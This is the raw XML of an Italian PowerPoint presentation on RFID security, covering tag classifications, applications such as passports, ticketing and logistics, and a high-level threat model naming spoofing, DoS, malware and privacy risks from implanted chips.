            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> - semipassivi con sensore a bordo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b="1" dirty="0" smtClean="0"/>
              <a:t>Classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> - attivi con trasmettitore integrato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9463" y="1982568"/>
            <a:ext cx="365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79463" y="635069"/>
            <a:ext cx="7583488" cy="5249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Classificazione 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79463" y="635069"/>
            <a:ext cx="7583488" cy="5249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effectLst/>
              </a:rPr>
              <a:t>Classificazione II</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:effectLst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779463" y="2058254"/>
            <a:ext cx="5013221" cy="423050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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> più semplici sono di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>chipless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, costituiti dalla sola antenna, che hanno l’unico scopo di rivelare la loro presenza in vicinanza di un lettore (sistemi antitaccheggio)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Poi ci sono dispositivi del tutto privi di logica, cioè privi capacità elaborativa, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>passivi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> che hanno id identificativo e dei dati scritti in precedenza</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Infine dispositivi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>attivi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>autoalimentati con un trasmettitore attivo a bordo con ampie capacità di elaborazione crittografiche capaci di difendersi da attacchi provenienti dalla rete perché sviluppati ad hoc.</a:t>
            </a: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57" y="3688363"/>
            <a:ext cx="1957321" cy="1308609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="FileWs rfrp.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="5038" t="20434" r="5820" b="15830"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5792684" y="2058254"/>
            <a:ext cx="2700997" cy="12487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rcRect t="18373"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672105" y="5272602"/>
            <a:ext cx="1164967" cy="11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79463" y="442299"/>
            <a:ext cx="7583488" cy="66435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Applicazioni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779461" y="2664202"/>
            <a:ext cx="7583490" cy="3801819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Passaporto </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Bigliettazione Elettronica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Logistica Magazzini (Identificare ogni contenitore e ogni scaffale di magazzino)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Logistica Trasporti smezzi di trasporto (vagoni, automobili, ecc.) Controllo presenze ed accessi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Identificazione degli animali </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Biblioteche - rilevazione patrimonio librario e movimento libri </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>Antitaccheggio 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9463" y="1951684"/>
            <a:ext cx="758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tecnologia RFID è considerata per la sua potenzialità di applicazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>una tecnologia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>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purpose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e presenta un elevato livello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pervasività</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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5039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Safety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> - Security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779463" y="2137558"/>
            <a:ext cx="4195209" cy="400722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Le caratteristiche dei sistemi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> hanno spinto lo sviluppo di tecnologie per un vasto raggio di applicazioni ma, al tempo stesso, esse presentano anche delle vulnerabilità. Infatti, un sistema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>RFId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, anche se intrinsecamente fidato, può essere sottoposto a minacce concernenti la sicurezza delle informazioni che tratta. Per questo motivo, molta attenzione è rivolta dalla maggior parte delle organizzazioni alla sicurezza delle informazioni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>I livelli di Sicurezza e di Privacy di un sistema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>RFId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> sono dipendenti dal rapporto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>costo/benefici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> strettamente legati alle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>necessità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>di impiego applicative. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto testo 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5133189" y="2003428"/>
            <a:ext cx="3390025" cy="5719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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Model</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRP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5487086" y="2852021"/>
            <a:ext cx="3086464" cy="293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Attacchi alla privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Virus/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Worm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4300752" cy="59861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Threat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779460" y="2323435"/>
            <a:ext cx="7816636" cy="3548571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Estremizzando un esempio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>si può ipotizzare uno scenario in cui una persona vada in un supermercato a fare spesa, paghi con un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> impiantato nel corpo una serie di prodotti ognuno con un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> identificativo. L’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> che ha nel proprio corpo oltre ad essere strumento per i pagamenti raccoglie anche informazioni sullo stato di salute della persona, oltre a localizzarla ovunque si trovi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Un possibile attaccante in uno scenario simile potrebbe ottenere molte informazioni di quella persona: potrebbe sapere i suoi gusti sapendo i prodotti che ha comprato, sapere le sue abitudini vedendo i suoi spostamenti e sapere il suo stato di salute. Con tutte queste informazioni, un’azienda, per esempio potrebbe proporgli prodotti mirati secondo i suoi gusti e la sua salute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>D’altro canto se la persona ha una qualche malattia tramite il chip sarebbe possibile rintracciarla in caso si sentisse male.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>In molti hanno avuto tali dubbi e hanno ipotizzato scenari simili.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06112" y="894444"/>
            <a:ext cx="538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Attacchi contro la riservatezza e la privacy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357</TotalTime>
  <Words>2363</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (4:3)</PresentationFormat>
  <Paragraphs>218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Pixel</vt:lpstr>
      <vt:lpstr>Sicurezza RFID</vt:lpstr>
      <vt:lpstr>DEFINIZIONE</vt:lpstr>
      <vt:lpstr>Un Sistema RFID è formato da un Lettore e un Tag</vt:lpstr>
      <vt:lpstr>Un Sistema RFID è formato da un Lettore e un Tag</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Classificazione II</vt:lpstr>
      <vt:lpstr>Applicazioni</vt:lpstr>
      <vt:lpstr>Safety - Security</vt:lpstr>
      <vt:lpstr>Threat model I</vt:lpstr>
      <vt:lpstr>Threat model I</vt:lpstr>
      <vt:lpstr>Threat model II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- Domande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RFID</dc:title>
  <dc:creator>oxory oxo</dc:creator>
  <cp:lastModifiedBy>{_oXoRy_}</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-05-06T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-05-10T10:05:57Z</dcterms:modified>
</cp:coreProperties>
</file>